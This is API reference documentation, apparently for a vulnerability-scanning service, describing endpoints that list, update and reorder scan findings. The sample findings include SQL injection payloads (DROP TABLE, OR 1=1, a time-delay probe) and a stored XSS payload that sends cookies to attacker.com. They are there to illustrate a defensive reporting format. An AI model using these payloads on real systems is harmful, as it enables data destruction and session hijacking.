Findings

View and manage vulnerability findings

GET/v1/scans/:scanId/findings

List findings for a scan

Retrieve a paginated list of vulnerability findings discovered during a scan. Findings can be filtered by severity level and user-assigned status. Results are ordered by severity (critical first) then by position.

Path Parameters

Name	Type	Description
`scanId`required	`string`	Scan ID (UUIDv7)

Query Parameters

Name	Type	Description
`page`	`number` Default: `1`	Page number for pagination
`limit`	`number` Default: `20`	Number of results per page (max 100)
`severity`	`string` criticalhighmediumlowinfo	Filter by severity level
`userStatus`	`string` openin_progressfixedaccepted_riskfalse_positive	Filter by user-assigned status

Example Request

bash

curl -X GET "https://apviso.com/api/v1/v1/scans/:scanId/findings" \
  -H "X-API-Key: apvk_your_key_here"

Response

Returns a paginated list of findings with full vulnerability details including CVSS scoring, CWE classification, evidence, reproduction steps, and remediation guidance.

json

{
  "data": [
    {
      "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "SQL Injection in /api/users endpoint",
      "severity": "critical",
      "cvssScore": 9.8,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "cweId": "CWE-89",
      "description": "The /api/users endpoint is vulnerable to SQL injection through the `sort` query parameter. An unauthenticated attacker can extract the full database contents, modify data, or execute operating system commands.",
      "evidence": "GET /api/users?sort=name%27%3B+DROP+TABLE+users%3B-- returned a 500 error with SQL error details in the response body.",
      "reproduction": [
        "Send a GET request to /api/users?sort=name' OR 1=1--",
        "Observe the response returns all user records regardless of authorization",
        "Confirm with time-based payload: /api/users?sort=name'; WAITFOR DELAY '0:0:5'--"
      ],
      "remediation": "Use parameterized queries or an ORM for all database operations. Validate and sanitize the `sort` parameter against an allowlist of column names.",
      "affectedUrl": "https://example.com/api/users",
      "agent": "scanner",
      "userStatus": "open",
      "position": 1,
      "createdAt": "2026-04-10T10:45:18Z",
      "updatedAt": "2026-04-10T10:45:18Z"
    },
    {
      "id": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "Cross-Site Scripting (Stored XSS) in user profile",
      "severity": "high",
      "cvssScore": 8.1,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "cweId": "CWE-79",
      "description": "The user profile bio field does not sanitize HTML input. Stored XSS payloads execute in the context of any user viewing the profile, enabling session hijacking and account takeover.",
      "evidence": "Setting the bio field to <script>fetch(\"https://attacker.com/steal?c=\"+document.cookie)</script> results in script execution when the profile is viewed.",
      "reproduction": [
        "Navigate to /settings/profile",
        "Enter <img src=x onerror=alert(document.domain)> in the bio field",
        "Save the profile and view it in another browser session",
        "Observe the JavaScript alert fires with the domain"
      ],
      "remediation": "Sanitize all user-generated HTML content using a library like DOMPurify. Implement Content-Security-Policy headers to mitigate impact.",
      "affectedUrl": "https://example.com/settings/profile",
      "agent": "scanner",
      "userStatus": "open",
      "position": 2,
      "createdAt": "2026-04-10T10:48:33Z",
      "updatedAt": "2026-04-10T10:48:33Z"
    }
  ],
  "pagination": {
    "page": 1,
    "limit": 20,
    "total": 21,
    "totalPages": 2
  }
}

PATCH/v1/scans/:scanId/findings/:findingId/status

Update finding status

Update the user-assigned status of a finding. Use this to track your remediation progress. Status changes are reflected in compliance posture calculations and report generation.

Path Parameters

Name	Type	Description
`scanId`required	`string`	Scan ID (UUIDv7)
`findingId`required	`string`	Finding ID (UUIDv7)

Request Body

Name	Type	Description
`userStatus`required	`string` openin_progressfixedaccepted_riskfalse_positive	New status for the finding

Example Request

bash

curl -X PATCH "https://apviso.com/api/v1/v1/scans/:scanId/findings/:findingId/status" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "userStatus": "in_progress"
}'

Response

Returns the finding ID with the updated status and timestamp.

json

{
  "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
  "userStatus": "in_progress",
  "updatedAt": "2026-04-10T15:22:08Z"
}

PATCH/v1/scans/:scanId/findings/reorder

Reorder findings

Update the display order of findings within a scan. Use this to customize the priority ordering in your reports and dashboard views. Positions are zero-indexed integers.

Path Parameters

Name	Type	Description
`scanId`required	`string`	Scan ID (UUIDv7)

Request Body

Name	Type	Description
`positions`required	`array`	Array of objects with `findingId` (string) and `position` (number) specifying the new order

Example Request

bash

curl -X PATCH "https://apviso.com/api/v1/v1/scans/:scanId/findings/reorder" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "positions": [
    {
      "findingId": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "position": 0
    },
    {
      "findingId": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "position": 1
    },
    {
      "findingId": "019414ca-c3d4-7e5f-a6b7-8c9d0e1f2a3b",
      "position": 2
    }
  ]
}'

Response

Returns a confirmation with the number of findings whose positions were updated.

json

{
  "message": "Findings reordered successfully",
  "updated": 3
}

Back to API Reference